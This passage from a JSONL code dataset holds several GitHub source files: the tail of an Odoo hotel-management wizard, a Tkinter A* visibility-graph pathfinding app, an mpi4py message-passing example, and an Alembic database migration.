pricelist in self.pricelist_ids:\n if self.service:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": self.service.id,\n \"fixed_price\": self.price,\n \"min_quantity\": self.min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(self.date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(\n vals\n )\n items.append(pricelist_item.id)\n elif self.massive_changes_on == \"availability_plan\":\n\n new_items = self.create_availability_plans_rules(\n room_types,\n self.availability_plan_ids,\n self.min_stay,\n self.apply_min_stay,\n self.min_stay_arrival,\n self.apply_min_stay_arrival,\n self.max_stay,\n self.apply_max_stay,\n 
self.max_stay_arrival,\n self.apply_max_stay_arrival,\n self.quota,\n self.apply_quota,\n self.max_avail,\n self.apply_max_avail,\n self.closed,\n self.apply_closed,\n self.closed_arrival,\n self.apply_closed_arrival,\n self.closed_departure,\n self.apply_closed_departure,\n date,\n self.rules_to_overwrite,\n pms_property,\n )\n items = items + new_items if new_items else items\n return items\n","repo_name":"OCA/pms","sub_path":"pms/wizards/wizard_massive_changes.py","file_name":"wizard_massive_changes.py","file_ext":"py","file_size_in_byte":35394,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"68"} +{"seq_id":"7028140499","text":"#!.venv/bin/python\n\nimport tkinter as tk\nfrom tkinter import font\n\nfrom time import perf_counter\nfrom math import sqrt, inf\nfrom random import randrange\n\nfrom queue import PriorityQueue\nfrom numba import njit\n\nfrom os import path, mkdir\n\n# Configurations ##############################################################\n\nclass State:\n IDLE = 0\n EDIT_START = 1\n EDIT_END = 2\n EDIT_MAP = 3\n\nclass Color:\n START = '#16a34a'\n END = '#dc2626'\n GRID = '#a3a3a3'\n CURSOR = '#000000'\n LINE = '#facc15'\n MAP = '#2563eb'\n POLYGON = '#bfdbfe'\n PREVIEW = '#475569'\n GRAPH = '#60a5fa'\n\nWIDTH = 1024\nHEIGHT = 768\nINF = inf\nPADDING = 10\nDOT_RADIUS = 5\nTILE_SIZE = 32\nFONT_SIZE = 10\n\nMAP_WIDTH = WIDTH // TILE_SIZE\nMAP_HEIGHT = HEIGHT // TILE_SIZE\n\n# Mutable states ##############################################################\n\nstart_pos = ()\nend_pos = ()\nresult_path = []\nmap = [] \ngraph = {}\n\nstate = State.IDLE\n\n# Tkinter widgets #############################################################\n\ndef App():\n window = tk.Tk(className=\"pathfinding\")\n window.title(\"Pathfinding\")\n window.resizable(False, False)\n\n global NORMAL_FONT, BOLD_FONT\n NORMAL_FONT = font.Font(size=FONT_SIZE, weight='normal')\n BOLD_FONT = font.Font(size=FONT_SIZE, weight='bold')\n\n root = tk.Frame(window).pack()\n\n config_menu = tk.Frame(root)\n config_menu.pack(padx=PADDING / 2, pady=PADDING, fill='x')\n\n map_menu = tk.Frame(config_menu)\n map_menu.pack(side=tk.LEFT, expand=1, anchor='w')\n\n global map_name\n map_name = tk.StringVar()\n tk.Entry(map_menu, textvariable=map_name).pack(side=tk.LEFT, padx=PADDING / 2)\n\n tk.Button(map_menu, text='Save', font=NORMAL_FONT, command=save_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Load', font=NORMAL_FONT, command=load_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Edit', font=NORMAL_FONT, command=edit_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Random', font=NORMAL_FONT, command=random_map).pack(side=tk.LEFT, padx=PADDING / 2)\n\n points_menu = tk.Frame(config_menu)\n points_menu.pack(side=tk.LEFT, expand=1, anchor='e')\n\n tk.Button(points_menu, text=\"Edit\", font=NORMAL_FONT, command=edit_points).pack(side=tk.LEFT, padx=PADDING / 2)\n\n global start_label\n start_label = tk.Label(points_menu, text=\"start = {...; ...}\", font=NORMAL_FONT)\n start_label.pack(side=tk.LEFT, padx=PADDING / 2)\n\n global end_label\n end_label = tk.Label(points_menu, text=\"end = {...; ...}\", font=NORMAL_FONT)\n end_label.pack(side=tk.LEFT, padx=PADDING / 2)\n\n global canvas\n canvas = tk.Canvas(root, bg=\"#ffffff\", width=WIDTH, height=HEIGHT)\n canvas.config(cursor='none')\n canvas.pack(padx=PADDING)\n\n canvas.bind('', canvas_motion)\n canvas.bind('', canvas_click)\n\n result_menu = tk.Frame(root)\n 
result_menu.pack(padx=PADDING / 2, pady=PADDING, side=tk.LEFT, anchor='w')\n\n global show_graph\n show_graph = tk.BooleanVar()\n show_graph.trace_add(\"write\", lambda *_: render())\n tk.Checkbutton(result_menu, text=\"Show graph\", variable=show_graph, onvalue=True, offvalue=False).pack(side=tk.RIGHT, padx=PADDING / 2)\n\n global distance_label\n distance_label = tk.StringVar(value=\"Distance: ...\")\n tk.Label(result_menu, textvariable=distance_label, font=NORMAL_FONT).pack(side=tk.LEFT, padx=PADDING / 2)\n\n global time_label\n time_label = tk.StringVar(value=\"Time: ...\")\n tk.Label(result_menu, textvariable=time_label, font=NORMAL_FONT).pack(side=tk.LEFT, padx=PADDING / 2)\n\n init_shapes()\n render()\n return window\n\n# Rendering ###################################################################\n\ndef draw_dot(pos, color, tag):\n dot_start_x = pos[0] - DOT_RADIUS\n dot_start_y = pos[1] - DOT_RADIUS\n\n dot_end_x = pos[0] + DOT_RADIUS\n dot_end_y = pos[1] + DOT_RADIUS\n\n canvas.create_oval(dot_start_x, dot_start_y, dot_end_x, dot_end_y, fill=color, outline='', tags=tag)\n\n\ndef align_point(x, y):\n aligned_x = round(x / TILE_SIZE) * TILE_SIZE\n aligned_y = round(y / TILE_SIZE) * TILE_SIZE\n return aligned_x, aligned_y\n\n\ndef draw_lines(points, fill, width, tag):\n canvas.delete(tag)\n last = ()\n for point in points:\n draw_dot(point, fill, tag)\n if last:\n canvas.create_line(last, point, fill=fill, width=width, tags=tag)\n\n last = point\n\n\ndef init_shapes():\n global poly\n poly = canvas.create_polygon([0, 0], fill=Color.POLYGON, outline='')\n\n # Draw the grid\n for i in range(MAP_WIDTH + 1):\n canvas.create_line(i * TILE_SIZE, 0, i * TILE_SIZE, HEIGHT, width=1, fill=Color.GRID)\n\n for i in range(MAP_HEIGHT + 1):\n canvas.create_line(0, i * TILE_SIZE, WIDTH, i * TILE_SIZE, width=1, fill=Color.GRID)\n\n\ndef render():\n global start_pos, end_pos, poly\n\n if state != State.EDIT_MAP and len(map) > 0:\n canvas.coords(poly, sum([[i[0], i[1]] for i in map], []))\n else:\n canvas.coords(poly, [0, 0])\n\n canvas.delete('graph')\n if state != State.EDIT_MAP and show_graph.get():\n for e1 in graph:\n pos1 = start_pos if e1 == -1 else end_pos if e1 == -2 else map[e1]\n for e2 in graph[e1]:\n if e1 < e2 or e2 == -2:\n pos2 = start_pos if e2 == -1 else end_pos if e2 == -2 else map[e2]\n \n if pos1 and pos2:\n canvas.create_line(pos1, pos2, fill=Color.GRAPH, width=1, tags='graph')\n \n draw_lines(map, Color.MAP, 3, 'map_outline')\n\n draw_lines(result_path, Color.LINE, 3, 'result_path')\n\n canvas.delete('start-end')\n if start_pos:\n draw_dot(start_pos, Color.START, 'start-end')\n if end_pos:\n draw_dot(end_pos, Color.END, 'start-end')\n\n\ndef draw_cursor(x, y):\n canvas.delete(\"cursor\")\n if state == State.IDLE:\n dot_color = Color.CURSOR\n elif state == State.EDIT_START:\n dot_color = Color.START if in_polygon(x, y) else Color.CURSOR\n elif state == State.EDIT_END:\n dot_color = Color.END if in_polygon(x, y) else Color.CURSOR\n elif state == State.EDIT_MAP:\n x_tiled = round(x / TILE_SIZE) * TILE_SIZE\n y_tiled = round(y / TILE_SIZE) * TILE_SIZE\n tiled_pos = (x_tiled, y_tiled)\n dot_color = Color.PREVIEW\n if map:\n canvas.create_line(map[0], tiled_pos, fill=Color.PREVIEW, width=3, tags='cursor')\n canvas.create_line(map[-1], tiled_pos, fill=Color.PREVIEW, width=3, tags='cursor')\n\n if len(map) > 2 and tiled_pos == map[0]:\n draw_dot(tiled_pos, Color.START, 'cursor')\n elif tiled_pos in map:\n draw_dot(tiled_pos, Color.END, 'cursor')\n else:\n draw_dot(tiled_pos, 
Color.PREVIEW, 'cursor')\n else:\n draw_dot(tiled_pos, Color.PREVIEW, 'cursor')\n else:\n raise Exception('Unreachable')\n draw_dot((x, y), dot_color, 'cursor')\n\n# Geometry ####################################################################\n\n\n@njit\ndef distance(a, b):\n xa, ya = a\n xb, yb = b\n dx = xa - xb\n dy = ya - yb\n return sqrt(dx * dx + dy * dy)\n\n\n@njit\ndef orientation(a, b, c):\n xa, ya = a\n xb, yb = b\n xc, yc = c\n val = (yb - ya) * (xc - xb) - (xb - xa) * (yc - yb)\n return 1 if val > 0 else 2 if val < 0 else 0\n\n\n@njit\ndef on_segment(a, b, c):\n xa, ya = a\n xb, yb = b\n xc, yc = c\n return xb <= max(xa, xc) and xb >= min(xa, xc) and yb <= max(ya, yc) and yb >= min(ya, yc)\n\n\n@njit\ndef intersect(p1, q1, p2, q2):\n o1 = orientation(p1, q1, p2)\n o2 = orientation(p1, q1, q2)\n o3 = orientation(p2, q2, p1)\n o4 = orientation(p2, q2, q1)\n\n if o1 != o2 and o3 != o4:\n return True\n\n if o1 == 0 and on_segment(p1, p2, q1):\n return True\n\n if o2 == 0 and on_segment(p1, q2, q1):\n return True\n\n if o3 == 0 and on_segment(p2, p1, q2):\n return True\n\n if o4 == 0 and on_segment(p2, q1, q2):\n return True\n\n return False\n\n\ndef in_polygon(x, y):\n inside = False\n for i in range(len(map) - 1):\n x1, y1 = map[i]\n x2, y2 = map[i + 1]\n\n if (y1 > y2):\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n\n # Check collision with horizontal line to the right of (x, y)\n if y > y1 and y <= y2 and x <= x1 + (x2 - x1) * (y - y1) / (y2 - y1):\n inside = not inside\n \n return inside \n\n# Graph generation ############################################################\n\ndef add_edge(idx1, idx2, pos1, pos2, rev):\n xi, yi = pos1\n xj, yj = pos2\n\n # In case it doesn't intersect with any polygon edge, discard if the\n # midpoint is outside of the polygon\n if not in_polygon((xi + xj) / 2, (yi + yj) / 2):\n return\n\n is_intersect = False\n \n for k in range(len(map) - 1):\n k1 = (k + 1) % (len(map) - 1)\n if k == idx1 or k == idx2 or k1 == idx1 or k1 == idx2:\n continue\n if intersect(pos1, pos2, map[k], map[k1]):\n is_intersect = True\n break\n\n if not is_intersect:\n dx, dy = xj - xi, yj - yi\n w = sqrt(dx * dx + dy * dy)\n \n if idx1 not in graph:\n graph[idx1] = {}\n\n graph[idx1][idx2] = w\n \n if rev:\n if idx2 not in graph:\n graph[idx2] = {}\n\n graph[idx2][idx1] = w\n\n\ndef generate_graph():\n global graph\n graph = {}\n \n for i in range(len(map) - 1):\n # All polygon edges are also edges of visibility graph\n j = (i + 1) % (len(map) - 1)\n w = distance(map[i], map[j])\n \n if i not in graph:\n graph[i] = {}\n\n if j not in graph:\n graph[j] = {}\n\n graph[i][j] = graph[j][i] = w\n\n for j in range(i + 2, len(map) - 1):\n add_edge(i, j, map[i], map[j], True)\n\n# Pathfinding ################################################################# \n\ndef pathfind():\n global result_path\n start_time = perf_counter()\n if not start_pos or not end_pos:\n return\n\n n = len(map) - 1\n\n # Add the start and end node to the visibility graph\n for i in range(n):\n p = map[i]\n add_edge(-1, i, start_pos, p, False)\n add_edge(i, -2, p, end_pos, False)\n add_edge(-1, -2, start_pos, end_pos, False)\n\n g = [INF] * n # g(x) = smallest distance from start to x\n h = [0.0] * n # h(x) = estimated cost to travel from x to end\n f = [INF] * n # f(x) = g(x) + h(x)\n p = [-3] * n # the parent of a node in the final path\n\n # Use euclidean distance to calculate h(x)\n for i in range(n):\n h[i] = distance(map[i], end_pos)\n\n # NOTE: switch to a binary heap to improve performance\n open = 
PriorityQueue()\n\n g_end = INF\n p_end = -3\n open_end = False\n\n # Basic A* implementation\n for adj in graph[-1]:\n if adj != -2:\n dist = graph[-1][adj]\n if dist < g[adj]:\n g[adj] = dist\n f[adj] = dist + h[adj]\n p[adj] = -1\n open.put((f[adj], adj))\n else:\n if graph[-1][-2] < g_end:\n g_end = graph[-1][-2]\n open_end = True\n p_end = -1\n\n while True:\n f_v, v = open.get()\n \n if open_end and g_end < f_v:\n break\n\n for adj in graph[v]:\n dist = g[v] + graph[v][adj]\n if adj != -2:\n if dist < g[adj]:\n g[adj] = dist\n f[adj] = dist + h[adj]\n p[adj] = v\n open.put((f[adj], adj))\n else:\n if dist < g_end:\n g_end = dist\n open_end = True\n p_end = v\n \n # Path reconstruction\n result_path = [end_pos]\n last = p_end\n\n while last != -1:\n result_path.append(map[last])\n last = p[last]\n \n result_path.append(start_pos)\n\n end_time = perf_counter()\n elapsed_time = (end_time - start_time) * 1000\n distance_label.set(f\"Distance: {g_end / TILE_SIZE:.2f}\")\n time_label.set(f\"Time: {elapsed_time:.2f}ms\")\n\n# Random map generation #######################################################\n\n@njit\ndef shuffle(a):\n for i in range(len(a)):\n idx = randrange(len(a))\n a[i], a[idx] = a[idx], a[i]\n\n\n@njit\ndef gen_poly(w, h, d=0.2):\n c = int((w - 1) * (h - 1) * d * d)\n\n vl = [(i, j) for i in range(1, w) for j in range(1, h)]\n shuffle(vl)\n vl = vl[:c]\n\n x = [i[0] for i in vl]\n y = [i[1] for i in vl]\n\n found = True \n while found:\n found = False\n for i in range(c - 1):\n if found:\n break\n\n for j in range(i + 2, c):\n if i == 0 and j == c - 1:\n continue\n i1, j1 = i + 1, (j + 1) % c\n p1 = (x[i], y[i])\n p2 = (x[i1], y[i1])\n p3 = (x[j], y[j])\n p4 = (x[j1], y[j1])\n\n if distance(p1, p2) + distance(p3, p4) > distance(p1, p3) + distance(p2, p4):\n found = True\n x[i + 1:j + 1] = x[j:i:-1]\n y[i + 1:j + 1] = y[j:i:-1]\n break\n\n res = []\n\n for i in range(c):\n p = (x[i] * TILE_SIZE, y[i] * TILE_SIZE)\n if len(res) > 1 and orientation(res[-2], res[-1], p) == 0:\n res.pop()\n res.append(p)\n \n if len(res) > 2 and orientation(res[-1], res[0], res[1]) == 0:\n res.pop(0)\n\n res.append(res[0])\n\n return res\n\n# Events ######################################################################\n\ndef reset():\n global start_pos, end_pos, result_path, graph\n start_pos = ()\n end_pos = ()\n result_path = []\n\n # Remove start and end from visibility graph\n if -1 in graph:\n del graph[-1]\n for e in graph:\n if -2 in graph[e]:\n del graph[e][-2]\n\n\ndef display_pos(pos, name):\n x, y = pos\n return f\"{name} = {{{x/TILE_SIZE:.2f}; {y/TILE_SIZE:.2f}}}\"\n\n\ndef canvas_motion(e):\n if state == State.EDIT_START:\n start_pos = (e.x, e.y)\n start_label.config(text=display_pos(start_pos, \"start\"), font=BOLD_FONT)\n elif state == State.EDIT_END:\n end_pos = (e.x, e.y)\n end_label.config(text=display_pos(end_pos, \"end\"), font=BOLD_FONT)\n\n draw_cursor(e.x, e.y)\n\n\ndef canvas_click(e):\n global start_pos, end_pos, state\n if state == State.EDIT_START and in_polygon(e.x, e.y):\n start_pos = (e.x, e.y)\n start_label.config(text=display_pos(start_pos, \"start\"),\n font=NORMAL_FONT)\n end_label.config(text=\"end = {...; ...}\", font=BOLD_FONT)\n end_label.cget('font')\n state = State.EDIT_END\n elif state == State.EDIT_END and in_polygon(e.x, e.y):\n end_pos = (e.x, e.y)\n end_label.config(text=display_pos(end_pos, \"end\"), font=NORMAL_FONT)\n pathfind()\n state = State.IDLE\n \n # Map editor\n elif state == State.EDIT_MAP:\n tiled_pos = align_point(e.x, e.y)\n\n if map:\n 
# Remove nodes by clicking it\n if tiled_pos in map and (len(map) == 1 or tiled_pos != map[0]):\n while map[-1] != tiled_pos:\n map.pop()\n map.pop()\n else:\n # Prevent self-intersecting polygons\n is_intersect = False\n for k in range(len(map) - 2):\n if tiled_pos == map[0] and k == 0:\n continue\n if intersect(map[-1], tiled_pos, map[k], map[k + 1]):\n is_intersect = True\n break\n\n if not is_intersect:\n if len(map) > 2:\n # Join colinear edges to lower edge count\n if orientation(map[-2], map[-1], tiled_pos) == 0:\n map.pop()\n\n # Finish editing by clicking the first node\n if tiled_pos == map[0]:\n if orientation(map[-1], map[0], map[1]) == 0:\n map.pop(0)\n\n map.append(map[0])\n state = State.IDLE\n global graph\n generate_graph()\n else:\n map.append(tiled_pos)\n elif tiled_pos != map[0]:\n map.append(tiled_pos)\n else:\n map.append(tiled_pos)\n\n render()\n draw_cursor(e.x, e.y)\n\ndef edit_points():\n global start_pos, end_pos, state, result_path\n if state == State.IDLE and len(map) > 3:\n reset()\n render()\n start_label.config(text=\"start = {...; ...}\", font=BOLD_FONT)\n end_label.config(text=\"end = {...; ...}\")\n\n distance_label.set(\"Distance: ...\")\n time_label.set(\"Time: ...\")\n state = State.EDIT_START\n\n\ndef save_map():\n global state\n if state == State.IDLE:\n if not path.exists('maps'):\n mkdir('maps')\n name = \"maps/\" + map_name.get() + \".mp\"\n with open(name, 'w') as f:\n for point in map:\n x, y = point\n f.write(f\"{x // TILE_SIZE} {y // TILE_SIZE}\\n\")\n\n\ndef load_map():\n global state, graph\n if state == State.IDLE:\n if not path.exists('maps'):\n mkdir('maps')\n\n name = \"maps/\" + map_name.get() + \".mp\"\n map.clear()\n reset()\n with open(name, 'r') as f:\n for line in f.readlines():\n x, y = (int(i) for i in line.split())\n map.append((x * TILE_SIZE, y * TILE_SIZE))\n generate_graph()\n render()\n\n\ndef edit_map():\n global state\n if state == State.IDLE:\n reset()\n if map:\n map.pop()\n state = State.EDIT_MAP\n render()\n\n\ndef random_map():\n global state, map, graph\n if state == State.IDLE:\n reset()\n map = gen_poly(MAP_WIDTH, MAP_HEIGHT, 0.5)\n generate_graph()\n render()\n\n# Entrypoint ##################################################################\n\nif __name__ == \"__main__\":\n App().mainloop()\n","repo_name":"ziap/pathfinding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73587278935","text":"from mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nn_processors = comm.Get_size()\n\nif rank != 0:\n message = \"Hello from process \" + str(rank)\n comm.send(message, dest=0)\nelse:\n\tfor pid in range(1, n_processors):\n\t\tmessage = comm.recv(source=pid)\n\t\tprint(\"Process 0 receives message from process {}: {}\".format(pid, message))\n","repo_name":"aubreyomondi/distributed_objects_labs","sub_path":"mpi_exercise/mpi_B.py","file_name":"mpi_B.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16487463703","text":"\"\"\"add topic_id to topic\n\nRevision ID: e2180472f6d1\nRevises: 0d6f972ccc6a\nCreate Date: 2021-07-12 20:53:48.763055\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e2180472f6d1'\ndown_revision = '0d6f972ccc6a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n 
# ### commands auto generated by Alembic - please adjust! ###\n op.add_column('topic', sa.Column('topic_id', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('topic', 'topic_id')\n # ### end Alembic commands ###\n","repo_name":"4hsinyili/0723_demo_hsinyili","sub_path":"Migration/versions/e2180472f6d1_add_topic_id_to_topic.py","file_name":"e2180472f6d1_add_topic_id_to_topic.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}